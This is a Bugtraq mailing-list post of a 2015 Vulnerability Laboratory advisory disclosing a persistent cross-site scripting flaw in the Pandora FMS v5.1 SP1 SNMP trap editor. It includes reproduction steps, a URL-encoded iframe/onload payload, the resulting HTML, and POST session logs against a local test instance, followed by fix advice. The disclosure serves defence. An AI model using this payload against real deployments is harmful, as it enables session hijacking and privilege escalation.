[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Pandora FMS v5.1 SP1 - Persistent SNMP Editor Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx
Subject: Pandora FMS v5.1 SP1 - Persistent SNMP Editor Vulnerability
From: "admin@xxxxxxxxxxxxxxxxx" <admin@xxxxxxxxxxxxxxxxx>
Date: Fri, 16 Jan 2015 13:04:24 +0100
Document Title:
===============
Pandora FMS v5.1 SP1 - Persistent SNMP Editor Vulnerability


References (Source):
====================
http://vulnerability-lab.com/get_content.php?id=1356


Release Date:
=============
2015-01-14


Vulnerability Laboratory ID (VL-ID):
====================================
1356


Common Vulnerability Scoring System:
====================================
3.4


Product & Service Introduction:
===============================
Pandora FMS is a monitoring Open Source software. It watches your systems and 
applications, and allows you to 
know the status of any element of those systems. Pandora FMS could detect a 
network interface down, a defacement 
in your website, a memory leak in one of your server application, or the 
movement of any value of the NASDAQ 
new technology market. 

    * Detect new systems in network.
    * Checks for availability or performance.
    * Raise alerts when something goes wrong.
    * Allow to get data inside systems with its own lite agents (for almost 
every Operating System).
    * Allow to get data from outside, using only network probes. Including SNMP.


    * Get SNMP Traps from generic network devices. 
    * Generate real time reports and graphics.
    * SLA reporting.
    * User defined graphical views.
    * Store data for months, ready to be used on reporting.
    * Real time graphs for every module. 
    * High availability for each component.
    * Scalable and modular architecture.
    * Supports up to 2500 modules per server.
    * User defined alerts. Also could be used to react on incidents.
    * Integrated incident manager.
    * Integrated DB management: purge and DB compaction. 
    * Multiuser, multi profile, multi group.
    * Event system with user validation for operation in teams.
    * Granularity of accesses and user profiles for each group and each user.
    * Profiles could be personalized using up to eight security attributes 
without limitation on groups or profiles. 

Pandora FMS runs on any operating system, with specific agents for each 
platform, gathering data and sending it to a 
server, it has specific agents for GNU/Linux, AIX, Solaris, HP-UX, BSD/IPSO, 
and Windows 2000, XP and 2003.

(Copy of the Vendor Homepage: 
http://pandorafms.org/index.php?sec=project&sec2=home&lang=en)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent web 
vulnerability in the official Pandora FMS v5.1 SP1 monitoring web-application.


Vulnerability Disclosure Timeline:
==================================
2015-01-14:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Artica Sulociones Tecnologicas
Product: Pandora FMS - Monitoring Web Application 5.1 SP1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in 
the official Pandora FMS v5.1 SP1 monitoring web-application.
The vulnerability allows an attacker to inject own script code as payload to 
the application-side of the vulnerable service function or module.

The vulnerability is located in the `oid` and `custom_oid` value of the `snmp 
trap editor` module. Remote attackers with low privileged user accounts 
are able to manipulate the create POST method request of the `snmp trap editor` 
module to compromise user session information. The attack vector is 
persistent on the application-side and the request method to inject is POST. 
The issue allows to stream persistent malicious script codes to the 
front site of the `snmp trap editor` module were the `item context` becomes 
visible as list. Local low privileged application user accounts with 
access to the snmp editor can inject own malicious script code to steal session 
information of a higher privileged monitoring application user account.

The security risk of the application-side web vulnerability is estimated as 
medium with a cvss (common vulnerability scoring system) count of 3.4.
Exploitation of the application-side web vulnerability requires a low 
privileged web-application user account and low or medium user interaction.
Successful exploitation of the vulnerabilities result in persistent phishing 
mails, session hijacking, persistent external redirect to malicious 
sources and application-side manipulation of affected or connected module 
context.

Request Method(s):
                                        [+] POST

Vulnerable Module(s):
                                        [+] SNMP > SNMP Trap Editor 

Vulnerable Parameter(s):
                                        [+] oid
                                        [+] custom_oid

Affected Module(s):
                                        [+] SNMP Trap Editor - Index


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote 
attackers with low privileged application user accounts 
and low user interaction. For security demonstration or to reproduce the 
vulnerability follow the provided information and steps 
below to continue. 

Manual steps to reproduce the vulnerability ...
1. Open the pandora fms web-application and login with a low privileged user 
account that is allowed to access the monitoring snmp editor module
2. Surf to the SNMP > SNMP trap editor
3. Create a new entry to inject own payloads with script code to the OID & 
Customer OID input fields
4. Save the input
Note: The monitoring service refreshs to list after the POST method request to 
add and displays the stored items of the snmp trap editor
5. The execution occurs of the injected script code occurs on the 
application-side of the service in the item output listing of the 
snmp_trap_editor
6. Successful reproduce of the security vulnerability!


Payload: (SNMP trap editor - Create)
oid=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C
&custom_oid=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C">"
><iframe src="a" onload="alert("VL")" <="" "=""><iframe src=a 
>onload=alert("VL") <


PoC: Exploit (SNMP trap editor - After the Create)
<table style="width:98%;" class="databox" id="table3" border="0" 
cellpadding="4" cellspacing="4"><thead><tr><th class="header c0" 
scope="col">OID</th><th class="header c1" scope="col">Custom OID</th><th 
class="header c2" scope="col">Severity</th><th class="header c3" 
scope="col">Text</th><th class="header c4" scope="col">Description</th><th 
class="header c5" scope="col">Actions</th></tr></thead>
<tbody>
<tr id="table3-0" style="" class="datos2">
<td id="table3-0-0" style="" class="datos2 "><a 
href="index.php?sec=estado&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor_form&
oid=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C&
custom_oid=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C">"
><iframe src="a" onload="alert("VL")" <="" "=""><iframe src=a 
>onload=alert("VL") <</a></td>
<td id="table3-0-1" style=""   class="datos2 ">


--- PoC Session Logs [POST] ---
Status: 200[OK]
 POST 
http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor_form
 
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] 
Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[fms.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 
Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      
Referer[http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor&delete_trap=1&id=-1%27]
      Cookie[PHPSESSID=21dq3ua37bcjcibptdn8uonk76]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   POST-Daten:
      add_trap[1]
      crt[Create]
   Response Header:
      Date[Mon, 17 Nov 2014 00:38:29 GMT]
      Server[Apache/2.2.15 (CentOS)]
      X-Powered-By[PHP/5.3.3]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0]
      Pragma[no-cache]
      Set-Cookie[=deleted; expires=Sun, 17-Nov-2013 00:38:29 GMT; path=/
clippy=deleted; expires=Sun, 17-Nov-2013 00:38:29 GMT
=deleted; expires=Sun, 17-Nov-2013 00:38:29 GMT; path=/
clippy=deleted; expires=Sun, 17-Nov-2013 00:38:29 GMT]
      Connection[close]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
 POST 
http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor
 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des 
Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[fms.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 
Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      
Referer[http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor_form]
      Cookie[PHPSESSID=21dq3ua37bcjcibptdn8uonk76]
      Connection[keep-alive]
   POST-Daten:
      
oid[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C+%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      
custom_oid[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      severity[2]
      
text[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C+++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      
description[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      add_trap[1]
      submit[Create]
   Response Header:
      Date[Mon, 17 Nov 2014 00:40:05 GMT]
      Server[Apache/2.2.15 (CentOS)]
      X-Powered-By[PHP/5.3.3]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, 
pre-check=0]
      Pragma[no-cache]
      Set-Cookie[=deleted; expires=Sun, 17-Nov-2013 00:40:05 GMT; path=/
clippy=deleted; expires=Sun, 17-Nov-2013 00:40:05 GMT
=deleted; expires=Sun, 17-Nov-2013 00:40:05 GMT; path=/
clippy=deleted; expires=Sun, 17-Nov-2013 00:40:05 GMT]
      Connection[close]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET http://fms.localhost:8080/pandora/%22%3E%3C[PERSISTENT INJECTED SCRIPT 
CODE!] 
Load Flags[LOAD_DOCUMENT_URI  ] Größe des Inhalts[295] Mime Type[text/html]
   Request Header:
      Host[fms.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 
Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      
Referer[http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor]
      Cookie[PHPSESSID=21dq3ua37bcjcibptdn8uonk76]
      Connection[keep-alive]
   Response Header:
      Date[Mon, 17 Nov 2014 00:40:07 GMT]
      Server[Apache/2.2.15 (CentOS)]
      Content-Length[295]
      Connection[close]
      Content-Type[text/html; charset=iso-8859-1]


Reference(s):
http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor_form
http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor
http://fms.localhost:8080/pandora/



Solution - Fix & Patch:
=======================
The security vulnerability can be patched by a secure restriction or filtering 
of the OID and customer OID input fields.
Encode and parse the input field context to prevent persistent execution of 
script code through the vulnerable snmp editor module.


Security Risk:
==============
The security risk of the application-side input validation web vulnerability in 
the pandora interface is estimated as medium. 
Lower privileged application user accounts are able to inject the code to steal 
session information and gain higher application access privileges.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(bkm@xxxxxxxxxxxxxxxxx) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen 
material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com              
                        - www.evolution-sec.com
Contact:    admin@xxxxxxxxxxxxxxxxxxxxx         - 
research@xxxxxxxxxxxxxxxxxxxxx                        - admin@xxxxxxxxxxxxxxxxx
Section:    magazine.vulnerability-db.com       - 
vulnerability-lab.com/contact.php                     - 
evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab 
                        - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php            - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - 
vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All 
other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, 
advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To 
record, list (feed), modify, use or edit our material contact 
(admin@xxxxxxxxxxxxxxxxxxxxx or research@xxxxxxxxxxxxxxxxxxxxx) to get a 
permission.

                                Copyright © 2015 | Vulnerability Laboratory - 
Evolution Security GmbH ™

-- 
COMPANY: Evolution Security GmbH - ADMINISTRATION
REPRESENTATIVES: Benjamin Kunz Mejri (DE)
LOCATION: HansRömhild Straße 14 @ 34128 Kassel (Hessen) in Germany
DOMAIN: www.evolution-sec.com
CONTACT: admin@xxxxxxxxxxxxxxxxx
PGP KEY: http://evolution-sec.com/admin@xxxxxxxxxxxxxxxxx%280x921A7E4C%29.asc

Phone: +49561-40064622 or 0561-40064622
Fax:  +49561-40066220 or 0561-40066220
Mobile:  +4915750765406 or 015750765406
Prev by Date: WiFi File Browser Pro v2.0.8 - Code Execution Vulnerability
Next by Date: File Pro Mini v5.2 iOS - Multiple Web Vulnerabilities
Previous by thread: WiFi File Browser Pro v2.0.8 - Code Execution Vulnerability
Next by thread: File Pro Mini v5.2 iOS - Multiple Web Vulnerabilities
Index(es):
- Date
- Thread